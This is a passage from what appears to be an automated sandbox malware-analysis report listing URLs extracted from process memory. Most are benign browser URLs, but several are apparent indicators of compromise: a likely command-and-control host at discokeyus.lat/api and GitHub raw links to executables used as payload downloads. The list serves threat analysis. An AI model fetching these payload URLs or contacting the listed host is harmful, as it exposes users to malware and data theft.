                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://coverage.mozilla.org
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://crash-stats.mozilla.org/report/index/
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsLis
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                              Source: ed7d415177.exe, 00000018.00000003.3304060633.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3595900652.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3152686589.00000000053CE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3345325564.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3539577851.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3428049058.0000000000951000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3358350057.0000000000938000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3231072571.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3227472595.00000000053C7000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3552378532.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3527329211.00000000017FD000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.0000000001766000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3594435833.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3445606549.0000000001762000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3529309223.0000000001766000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3445606549.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3652544592.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3653308525.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3519683724.00000000017F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                              Source: ed7d415177.exe, 00000018.00000003.3595900652.0000000000958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/%
                              Source: ed7d415177.exe, 0000001E.00000003.3652544592.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/&
                              Source: ed7d415177.exe, 00000018.00000003.3146093450.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3146695832.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3594435833.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3652544592.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/L
                              Source: ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/V
                              Source: ed7d415177.exe, 00000018.00000003.3484637549.0000000000945000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3232038991.0000000000966000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3595581104.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3564661429.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3235297402.0000000000966000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3653308525.000000000176F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                              Source: ed7d415177.exe, 0000001E.00000003.3595404950.000000000176F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiLT
                              Source: ed7d415177.exe, 0000001E.00000003.3635731415.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450907146.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3487975673.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450280730.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3590733127.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3482305250.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3419016658.0000000005ED1000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3507390509.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3536597661.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3452391310.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3621884042.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3449781945.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3406193930.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3403952992.0000000005ECA000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3501351249.0000000005ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiation_
                              Source: ed7d415177.exe, 0000001E.00000003.3635731415.0000000005ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apill_sou
                              Source: ed7d415177.exe, 0000001E.00000003.3635731415.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450907146.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3487975673.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450280730.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3343159529.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3590733127.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3482305250.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3419016658.0000000005ED1000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3507390509.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3536597661.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3452391310.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3621884042.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3354774274.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3449781945.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3406193930.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334057371.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3403952992.0000000005ECA000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3501351249.0000000005ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apittp_ca
                              Source: ed7d415177.exe, 00000018.00000003.3539577851.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/c
                              Source: ed7d415177.exe, 00000018.00000003.3595900652.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3539577851.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/j
                              Source: ed7d415177.exe, 0000001E.00000003.3445606549.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
                              Source: ed7d415177.exe, 0000001E.00000003.3445606549.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api8
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                              Source: firefox.exe, 00000030.00000003.3313163016.000002238E377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312075480.000002238E31F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3311874121.000002238E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sPdfJs.init
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1chrome://browser/content/browser.xhtml
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1chrome://browser/content/browser.xhtmlParent
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B5EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                              Source: c9692f9101.exe, 00000014.00000003.3634688996.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638199431.0000000005671000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3635238092.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638728492.0000000005612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2851825660.0000019CC520E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                              Source: firefox.exe, 00000030.00000002.3613633704.000002238B603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                              Source: powershell.exe, 00000011.00000002.2690416299.0000000005095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2688444765.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002344000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002344000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.000000000235B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe
                              Source: firefox.exe, 00000030.00000003.3313163016.000002238E377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312075480.000002238E31F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3311874121.000002238E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsMozilla
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ideas.mozilla.org/
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A60B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://install.mozilla.org
